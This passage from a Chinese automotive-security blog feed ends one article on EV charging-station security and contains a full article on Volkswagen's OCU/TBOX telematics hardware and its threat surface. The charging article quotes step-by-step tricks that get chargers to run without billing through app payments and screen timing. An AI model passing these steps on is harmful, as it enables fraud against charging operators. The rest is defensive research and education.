元,等待数秒后,再将充电枪连接电动车。接着按一下充电枪上的开关,如果充电桩上的充电指示灯亮着表示窃电成功,电桩会给电动车充电且不进行计费。<br>“卡秒法”:利用 e充电 APP 扫描充电桩上的二维码,然后支付 0.5 或 1 元,等数秒后再按插在车上的充电枪开关,充电桩屏幕显示开始计费并且显示秒数,等 10 秒然后点击屏幕的返回键,再用 e充电 扫一遍充电桩上的二维码,如果充电桩的充电指示灯亮着表示窃电成功,反之意味着窃电失败,需要重新尝试。</p></li><li><p><strong>卡巴斯基发现 ChargePoint 家用充电桩多个漏洞</strong></p><p>2018 年卡巴斯基在 ChargePoint 的家用充电桩上发现多个漏洞,允许远程攻击者调整充电电流以及随时停止汽车的充电过程,从而导致潜在的物理损坏和经济损失。该家用充电站支持 WiFi 和蓝牙无线技术,用户可通过 iOS 及 Android 平台的移动应用程序远程控制充电过程。研究人员发现该设备的 Web 服务器存在证书安全问题、缓冲区溢出等漏洞。</p></li></ul><h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>本文介绍了充电基础设施的架构与通信协议,总结了充电基础设施面临的安全风险,列举了充电桩被攻陷的案例。</p><p>星舆车联网安全实验室致力于车联网安全研究。实验室近期发现某充电控制计费单元存在多个漏洞,综合利用我们挖掘的这些漏洞可以实现免费充电。漏洞被滥用,会给充电桩运营企业带来巨大的损失。漏洞涉及多个品牌的充电桩,属于供应链漏洞。通过网络设备搜索引擎检索发现有1万多个充电桩暴露在公网中。当前我们已联系相关责任方,后续会遵循负责披露的原则公布我们的研究成果。充电柜的漏洞也在积极与厂商接触中。</p><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li><p><a href="http://timeline.icvsec.com/">汽车信息安全事件时间轴</a></p></li><li><p><a href="https://www.cec.org.cn/upload/file/biaozhunhua/zhongdianlianbiaozhun/2019-09-29/508a7dfb58b92835782493dba29c5b54.pdf">电动汽车充电设施信息安全技术规范 </a></p></li><li><p><a href="https://www.sohu.com/a/243598761_180520">新能源汽车充电桩配套供应商大全</a></p></li><li><p><a href="https://www.forlinx.com/dianli/227.html">充电桩解决方案-充电桩计费控制单元</a></p></li><li><p><a href="https://mp.weixin.qq.com/s/EmI1mYwrEJWO1Ip2JXx_SQ">想参与国家电网充电桩招标?那可不能没有它。</a></p></li><li><p><a href="https://max.book118.com/html/2021/0104/8052047033003034.shtm">《CCTIA-充电桩与运营平台通讯协议》</a></p></li><li><p><a href="https://www.cec.org.cn/upload/file/biaozhunhua/zhongdianlianbiaozhun/2019-09-29/508a7dfb58b92835782493dba29c5b54.pdf">《T/CEC 208—2019 电动汽车充电设施信息安全技术规范》</a></p></li><li><p>《NB/T 33001-2010:电动汽车非车载传导式充电机技术条件》</p></li><li><p>《非车载整车直流充电机通用技术规范》</p></li><li><p>《GB/T 27930-2015 电动汽车非车载传导式充电机与电池管理系统之间的通信协议》</p></li><li><p>《T/CEC 102.4-2016 电动汽车充换电服务信息交换》</p></li></ul>]]></content>
<summary type="html"><p>7 月 30 日国务院正式公布《关键信息基础设施安全保护条例》,可见国家对关键信息基础设施安全的重视程度之高。其中电动汽车充电设施是关键信息基础设施中重要的组成部分,同时在《汽车数据安全管理若干规定》第三条中也将<code>汽车充电网的运行数据</code>划归为了重要数据</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全基础知识之大众J949(OCU/TBOX)</title>
<link href="http://delikely.github.io/2021/09/29/VW-OCU/"/>
<id>http://delikely.github.io/2021/09/29/VW-OCU/</id>
<published>2021-09-29T04:46:29.000Z</published>
<updated>2021-10-29T16:08:58.000Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全基础知识之大众J949-OCU-TBOX"><a href="#车联网安全基础知识之大众J949-OCU-TBOX" class="headerlink" title="车联网安全基础知识之大众J949(OCU/TBOX)"></a>车联网安全基础知识之大众J949(OCU/TBOX)</h2><p> OCU(Online Connectivity Unit)既紧急呼叫模块和通信单元。其他车上的同类模块在国内通常称之为 TBOX(Telematics BOX)。国外多称之为 TCU(Telematics Control Unit)。</p><p>OCU 具有一个固定的内置SIM卡, 用于登录移动网络。 它的作用是发送和接收 Car-Net e-Remote 服务的数据和命令。 通过无线网络实现永久的互联网连接, 确保后台和车辆之间的数据传输, 即使在关闭点火开关后也可以接收、 处理和执行命令。OCU 是车联网系统系统中最重要的组件之一。</p><h3 id="主要功能"><a href="#主要功能" class="headerlink" title="主要功能"></a>主要功能</h3><p>OCU 的功能和其他 TBOX 功能相似,详情见 <a href="https://mp.weixin.qq.com/s/WmNT6Kbw74EluaKLZUH64g">车联网安全基础知识之TBOX主要功能</a>。</p><h3 id="4-代-OCU-硬件分析"><a href="#4-代-OCU-硬件分析" class="headerlink" title="4 代 OCU 硬件分析"></a>4 代 OCU 硬件分析</h3><p>第一代 OCU1 出现在 2012 年,现已经历四次迭代,当前最新版本第四代 OCU4。OCU 的供应商为 LG,第一代在越南制造,第三代在中国或越南制造。第四代由越南制造。OCU 从第 3 代起开始逐步支持车载以太网。</p><p>OCU 安装在仪表板后面,附带备用电池和备用天线。外接有蜂窝网络天线和 GNSS 定位天线,部分版本还有 Wi-Fi 天线。增加备用电池、内置扬声器和内置通讯天线来增强 OCU 的健壮性,避免出现整车断电无法拨打 eCall 的情况。主连接器中,有电源、调试接口、CAN、以太网、音视频等接口。</p><p><img src="image-20210727235612456.png" alt="image-20210727235612456" style="zoom:38%;" /></p><p>对外通信方面,OCU 使用内置 eSIM 卡,支持的频段在不同国家存在一定的差异。GNSS 定位支持所有主流的定位系统,包括 GPS、Glonass、Beidou、SBAS 以及 Galileo。</p><h4 id="OCU4-TLVHE4IU"><a href="#OCU4-TLVHE4IU" class="headerlink" title="OCU4-TLVHE4IU"></a>OCU4-TLVHE4IU</h4><p>2019 年推出最新的第四代 OCU。今年大众推出的 ID.4 就使用了最新的 OCU4。</p><p><img src="image-20210810173934227.png" alt="image-20210810173934227" style="zoom:50%;" /></p><h5 id="TLVHE4IU-N"><a href="#TLVHE4IU-N" class="headerlink" title="TLVHE4IU-N"></a><a href="https://fccid.io/BEJTLVHE4IU-N">TLVHE4IU-N</a></h5><p>OCU4 高配,不支持蓝牙和 Wi-Fi。使用的主要芯片如下 。</p><ul><li><strong>通信模组</strong>:Qualcomm MDM9240,支持的频段包括GSM 850/1900、UMTS B2/B4/B5/*B6、LTE FDD B2/B4/B5/B12/B13/B17/B29(RX);</li><li><strong>MCU:</strong> 英飞凌 Tricore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>,有丰富的接口 1x FlexRay,2x LIN,4x QSPI,6x CAN,包括数据速率增强的 CAN FD;</li></ul><p><img src="image-20210810175257907.png" alt="image-20210810175257907"></p><h5 id="TLVHE4IU-E"><a href="#TLVHE4IU-E" class="headerlink" title="TLVHE4IU-E "></a><a href="https://fccid.io/BEJTLVHE4IU-N">TLVHE4IU-E </a></h5><p>不支持蓝牙和 Wi-Fi。使用的主要芯片如下。</p><ul><li><p><strong>通信模组</strong>:Qualcomm MDM9240,支持频段 LTE FDD B7。</p></li><li><p><strong>MCU:</strong> 英飞凌 Tricore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>,有丰富的接口 1x FlexRay,2x LIN,4x QSPI,6x CAN,包括数据速率增强的 CAN FD;</p></li></ul><p><img src="image-20210810173138847.png" alt="image-20210810173138847"></p><h4 id="OCU3-TLVHM3IU-TLVLM3IU"><a href="#OCU3-TLVHM3IU-TLVLM3IU" class="headerlink" title="OCU3-TLVHM3IU/TLVLM3IU"></a>OCU3-TLVHM3IU/TLVLM3IU</h4><p>OCU3 的 PCB 板大体结构相似,主要由一个通信模组以及一个用于和总线交互的 MCU 组成,剩下就是按需配置的以太网桥、Wi-Fi 芯片等。剩下的就是一些基础的电路模块如电源管理、晶振、滤波等。</p><p>OCU3 有高低配两个版本,但在高低配之下还有划分。高低配直接的差别是高配支持以太网,低配不支持。其他版本的差异主要是通信基带支持的频段不同、以及是否支持 Wi-Fi 和蓝牙。</p><p>OCU3 小版本较多,外观上也有如下两个版本,左边的一个较为圆润,右边一个棱角分明。</p><p><img src="image-20210727224548555.png" alt="image-20210727224548555" style="zoom:25%;" /></p><h5 id="TLVHM3IU-E、TLVHM3IU-N-高配"><a href="#TLVHM3IU-E、TLVHM3IU-N-高配" class="headerlink" title="TLVHM3IU-E、TLVHM3IU-N 高配"></a><a href="https://fccid.io/BEJTLVHM3IU-E">TLVHM3IU-E</a>、<a href="https://fccid.io/BEJTLVHM3IU-N">TLVHM3IU-N</a> 高配</h5><p>OCU3 高配,支持以太网,不支持 Wi-Fi 和蓝牙。使用的主要芯片如下。</p><ul><li><p><strong>通信模组</strong>:Qualcomm MDM9240,支持的频段包括 GSM 900/1800 、UMTS B1/B3/B8 、LTE FDD B1/B3/B7/B8/B20/B28A;</p></li><li><p><strong>以太网桥:</strong> 东芝 <a href="https://toshiba.semicon-storage.com/ap-en/semiconductor/product/automotive-devices/automotive-interface-bridge-ics/detail.TC9560XBG.html">TC9560XBG</a>,采用 ARM Cortex-M3 架构,支持 IEEE 802.1AS 和 IEEE 802.1Qav 等标准;RealTek <a href="https://edit.wpgdadawant.com/uploads/news_file/program/2019/35382/tech_files/RTL9047AA_SDK_API_guite_DDT.pdf">RTL9044AB</a>;</p></li><li><p><strong>MCU:</strong> 英飞凌 Tricore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>,有丰富的接口 1x FlexRay,2x LIN,4x QSPI,6x CAN,包括数据速率增强的 CAN FD;</p></li></ul><p><img src="image-20210804142622826.png" alt="image-20210804142622826" style="zoom:25%;" /></p><h5 id="TLVLM3IU-N-低配"><a href="#TLVLM3IU-N-低配" class="headerlink" title="TLVLM3IU-N 低配"></a><a href="https://fccid.io/BEJTLVLM3IU-N">TLVLM3IU-N</a> 低配</h5><p>OCU3 低配,支持 Wi-Fi ,没有以太网和蓝牙。使用的主要芯片如下。</p><ul><li><p><strong>通信模组</strong>:Qualcomm MDM9628,支持的频段包括 GSM 900/1800 、UMTS B1/B3/B8 、LTE FDD B2/B4/B5/B12/B17;</p></li><li><p><strong>MCU:</strong> 英飞凌 Tricore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>,有丰富的接口 1x FlexRay,2x LIN,4x QSPI,6x CAN,包括数据速率增强的 CAN FD;</p></li></ul><p><img src="image-20210804152358291.png" alt="image-20210804152358291" style="zoom:30%;" /></p><h5 id="TLVLM3IU-E-低配"><a href="#TLVLM3IU-E-低配" class="headerlink" title="TLVLM3IU-E 低配"></a><a href="https://fccid.io/BEJTLVLM3IU-E">TLVLM3IU-E</a> 低配</h5><p>OCU3 低配,不支持以太网、Wi-Fi 及蓝牙。使用的主要芯片如下。</p><ul><li><p><strong>通信模组</strong>:Qualcomm MDM9240,支持的频段包括 GSM 900/1800 、UMTS B1/B3/B8 、LTE FDD B1/B3/B7/B8/B20/B28A;</p></li><li><p><strong>MCU:</strong> 英飞凌 Tricore <a href="https://www.infineon.com/cms/en/product/microcontroller/32-bit-tricore-microcontroller/32-bit-tricore-aurix-tc2xx/tc2xx-emulation-devices/sak-tc234le-32f200f-ab/">SAK-TC234LE-32F200F AB</a>,有丰富的接口 1x FlexRay,2x LIN,4x QSPI,6x CAN,包括数据速率增强的 CAN FD;</p></li></ul><p><img src="image-20210804154005728.png" alt="image-20210804154005728" style="zoom:36%;" /></p><h4 id="OCU2-TUVM02IU"><a href="#OCU2-TUVM02IU" class="headerlink" title="OCU2 - TUVM02IU"></a>OCU2 - TUVM02IU</h4><p>FCC ID 为 TUVM02IU-E、TUVM02IU-C 等,未查询具体的资料。</p><p><img src="image-20210804193001931.png" alt="image-20210804193001931" style="zoom: 30%;" /></p><h4 id="OCU1-TUVM01IU"><a href="#OCU1-TUVM01IU" class="headerlink" title="OCU1-TUVM01IU"></a>OCU1-TUVM01IU</h4><p><a href="https://fccid.io/BEJTUVM01IU">TUVM01IU </a>是第一代 OCU,在越南制造。支持的频段包括 GSM 1900 PCS UP | LTE 2,1900 PCS UP | LTE 25,1900+ UP | LTE 35,TD PCS Lower DOWN | UMTS CH 2 UP | UMTS CH 25 UP | UMTS CH 35 DOWN 。</p><p>OCU 第一代经历过 3 次较大的硬件升级,从TUVM01IU-G 从衍生出了 TUVM01IU-R、TUVP01IU-G、TUVP01IU-R 等。</p><p><img src="image-20210804193247841.png" alt="image-20210804193247841" style="zoom:30%;" /></p><p>下图是 MQB 平台中使用第一代 OCU 的电路板,部分芯片丝印已无法识别。可识别的主要芯片如下。</p><ul><li><strong>MCU:</strong> 飞思卡尔 <a href="https://www.nxp.com.cn/part/SPC5606BK0MLL6?lang=cn#/">SPC5606BMLL6</a> 32 位 PPC 架构的 MCU,内存为 1MB,处理器频率为 64MHz。通信方式有 6 路 CAN,使用 JTAG 进行调试。</li><li><strong>SDRAW: </strong> 华邦 <a href="https://www.semiee.com/file/Winbond/Winbond-W94AD6KBHX.pdf">W94AD6KBHX</a>。</li></ul><p><img src="image-20210804215151781.png" alt="image-20210804215151781"></p><h4 id="接口测试"><a href="#接口测试" class="headerlink" title="接口测试"></a>接口测试</h4><p>手头正好有一个 OCU3,接上 12V 直流电,使用逻辑分析仪识别出了 CAN 接口。其中一条报文的 ID 为 0x36F,数据为 F8 FF FF BF FF FF FF 07。</p><p><img src="image-20210804161054778-16285767429881.png" alt="image-20210804161054778"></p><p>但在识别串口的时候出现了异常,使用常见的波特率无法解析数据。猜测使用了自有协议通信,无法查看到明文的数据。串口的使用需要用到后面讲到的开发工具 ODT。</p><p><img src="image-20210621203222034.png" alt="image-20210621203222034"></p><p>对其他接口的测试这里暂不展示。</p><h4 id="开发工具-ODT"><a href="#开发工具-ODT" class="headerlink" title="开发工具 ODT"></a>开发工具 ODT</h4><p>在第一代 OCU 中,使用 ODT(OCU Development Tool,OCU开发工具) 调试、测试、分析 OCU。</p><p><img src="image-20210803190800583.png" alt="image-20210803190800583" style="zoom:35%;" /></p><p>ODT 运行在 Window 系统上,通过 USB 转串口工具与 OCU 相连。 ODT 具有查看信息、设置参数、触发功能等功能。</p><ul><li><strong>查看信息:</strong>在 ODT 可以直观的查看 GNSS定位信息、网络状态、SIM卡信息、电源状态、系统日志、服务日志、调试日志、配置数据等;</li><li><strong>设置参数:</strong>除了查看功能外,还能设置一些列参数,如 APN、供电模式等;</li><li><strong>触发功能:</strong>此外,还能够收发短信、播放音频、升级系统等。</li></ul><p><img src="image-20210803191145364.png" alt="image-20210803191145364"></p><h4 id="车联网中的-OCU"><a href="#车联网中的-OCU" class="headerlink" title="车联网中的 OCU"></a>车联网中的 OCU</h4><p>在车联网系统中,OCU 处于核心位置。从下图中可以看出,OCU 通过 CAN 总线和车载以太网接入网关; J794(车机) 方面,除了通过信息娱乐 CAN 相连以外, J794(车机) 还与 OCU 上的麦克风、扬声器相连。</p><p><img src="image-20210804173827503.png" alt="image-20210804173827503"></p><p>在大众最近的电子架构中,OCU 与车载应用服务器(ICAS1)通过车载以太网和CAN总线相连。OCU 与 娱乐系统(ICAS3)通过 A2B 相连。 </p><p><img src="image-20210803221158220.png" alt="image-20210803221158220"></p><h4 id="OCU-硬件总结"><a href="#OCU-硬件总结" class="headerlink" title="OCU 硬件总结"></a>OCU 硬件总结</h4><p>纵观四代 OCU 的发展,功能越来越丰富,承载的数据量也越来越大。在外观方面,各代差异较小,外部连接上依旧是少数的天线接口和主连接器上的排针,但可以看出还是多出了一些接口。芯片方面,仍旧采用通信模组搭配MCU的方案,通信模组负责与外界进行无线通信,MCU 负责与总线通信。伴随着技术的更替,车载以太网开始在车端广泛应用,以太网交换芯片的出现是OCU发展的最大变化,某种意义上也意味着车载网络的变革。</p><p>历代 OCU 使用的主要芯片变化不大,通信模组采用高通 MDM平台,供应商为 Sierra Wireless。国内其他厂商的 TBOX 常使用移远通信的通信模组。通信模组使用 eSIM卡;与 MCU 通过 SPI 和 GPIO 相连;与以太网网桥通过 PCIE 相连;与以太网交换芯片通过 RGMI 和 SPI 相连;与音视频芯片通过 I2S 相连。</p><p>MCU 与主控(通信模组) 通过SPI 和 GPIO 相连;下端连接 CAN、按钮、安全气囊等。</p><p><img src="image-20210813124534571.png" alt="image-20210813124534571"></p><p>本文主要讲解硬件部分,系统与软件部分后续会专题讲解。</p><h3 id="安全威胁"><a href="#安全威胁" class="headerlink" title="安全威胁"></a>安全威胁</h3><p>以渗透测试人员的角度审视 OCU 的安全,并列举一些常见的风险点。这里以大众 OCU 为主体,也会谈及一些通用 TBOX 的共性问题。</p><h4 id="通信"><a href="#通信" class="headerlink" title="通信"></a>通信</h4><ul><li><p>无线网络</p><p>OCU 具备的无线通信方式有蜂窝网络、GNSS、Wi-Fi,可能还有蓝牙。蜂窝网络存在被降级的风险;定位存在被欺骗的风险,国内采用多模,仅 GPS 可被欺骗,威胁系数较小;Wi-Fi 层面一是配置安全,比较重要的一点是初始密码的强度,然后是 Wi-Fi 网络下网络隔离以及开放服务的安全。蓝牙主要是协议栈的安全。</p></li><li><p>内网 APN</p><p>通过 OCU APN 接入企业内网,由于内网防护较弱,容易被渗透。</p></li><li><p>总线</p><p>通过 OCU 总线攻击其他 ECU。</p></li></ul><h4 id="OTA"><a href="#OTA" class="headerlink" title="OTA"></a>OTA</h4><p>一般状态下,智能网联汽车中 OTA 请求与固件包的下发是通过 OCU 与 TSP 来实现的。获取到系统权限后,既可以通过分析升级程序或者分析通信流量获取固件包,获取升级包后,分析升级 包可以发现其中的脆弱点进行利用;还能分析出其他 ECU 的升级逻辑,利用升级程序缺陷刷入恶意固件绕过安全限制或植入恶意代码。</p><p><img src="image-20210815221455601.png" alt="image-20210815221455601"></p><p>以下是一些可能出现问题的点:</p><ol><li>云端威胁,OTA 平台存在漏洞。</li><li>OTA 固件泄露,泄露的途径有OTA管理平台漏洞、测试包泄露、售后泄露、明文传输截取、逆向程序获取下载地址等。</li><li>升级程序设计缺陷,如升级包签名验签绕过等。</li><li>OTA 的可用性,在实施软件升级时,若不能保证策略的合理性、提示的有效性,将会严重影响消费者的生命和财产安全,如某车型在长安街上停车一小时,乘客无法操纵车辆,甚至无法下车,给公共交通安全和用户生命安全带来严重隐患。</li></ol><h4 id="硬件安全"><a href="#硬件安全" class="headerlink" title="硬件安全"></a>硬件安全</h4><ol><li>预留未保护的调试接口,如串口、ADB、USB、JTAG 等。</li><li>存储安全,SOP 封装 Flash 易被提取。</li><li>MCU 代码读保护未开启,可提取固件、动态调试等。</li></ol><h4 id="系统-软件安全"><a href="#系统-软件安全" class="headerlink" title="系统/软件安全"></a>系统/软件安全</h4><ol><li>使用过时的组件,开源组件存在已知漏洞,如 Dnsmasq。</li><li>未划分用户权限,都以 root 权限运行。</li><li>软件本身存在的漏洞,如命令注入、缓冲区溢出等。</li><li>开放的服务存在缺陷,SSH、Telnet 弱口令,私有服务传输敏感信息等。</li></ol><h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>这篇文章实质上是对 TBOX 的一次安全分析。之所以没有直接讲TBOX,是因为直接讲太过空洞。于是借助 OCU 将 TBOX 实体化,讲一次实际的案例。不同厂家的设计方案虽有不同,但大体还是相似的。遂以小见大,把对 OCU 的安全认知类推到其他 TBOX 上。</p><h3 id="致谢"><a href="#致谢" class="headerlink" title="致谢"></a>致谢</h3><p>感谢 Julie 的校对与建议、感谢提供参考资料的 Gorgias。</p><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li><p><a href="https://fccid.io/">FCC ID Search</a></p></li><li><p><a href="https://zhuanlan.zhihu.com/p/149857986">大众的 Telematics OCU3 单元 </a></p></li><li><a href="https://mp.weixin.qq.com/s/F27-l4K5Pw7Y8rAu4yobzQ"> 科普 汽车紧急呼叫系统 eCall </a></li><li><a href="https://www.sohu.com/a/451924689_391994">大众ID3架构深度分析:软件定义汽车还很遥远</a></li><li><a href="https://mp.weixin.qq.com/s/SETvDrL9CDd0sjIHKIOKYw">混合动力和新能源车辆装备的RTM系统你了解多少?</a></li><li><a href="https://baijiahao.baidu.com/s?id=1659120997441175732&wfr=spider&for=pc">自动驾驶专题报告:三大驱动力,拐点已至,浪潮呼啸</a></li><li><a href="https://www.izt-labs.de/testing-ecall-systems/">IZT Signal Generators ready for testing eCall-Systems - IZT GmbH</a></li><li><a href="https://www.sohu.com/a/197544369_776444">汽车TCU(Telematics Control Unit) 远程信息控制单元应用价值及趋势</a></li></ul><h3 id="系列文章"><a href="#系列文章" class="headerlink" title="系列文章"></a>系列文章</h3><ul><li><a href="https://mp.weixin.qq.com/s/FzF7ERiWZ_GGKLW4kqrH9Q">车联网安全基础知识之汽车模块化平台</a></li><li><a href="https://mp.weixin.qq.com/s/YyHRexeKgGd4RAgQ4o-jKw">车联网安全基础知识之大众集团汽车电子电气架构</a></li><li><a href="https://mp.weixin.qq.com/s/WmNT6Kbw74EluaKLZUH64g">车联网安全基础知识之 TBOX 主要功能</a></li></ul>]]></content>
<summary type="html"><h2 id="车联网安全基础知识之大众J949-OCU-TBOX"><a href="#车联网安全基础知识之大众J949-OCU-TBOX" class="headerlink" title="车联网安全基础知识之大众J949(OCU/TBOX)"></a>车联网安全基础知识之</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
</feed>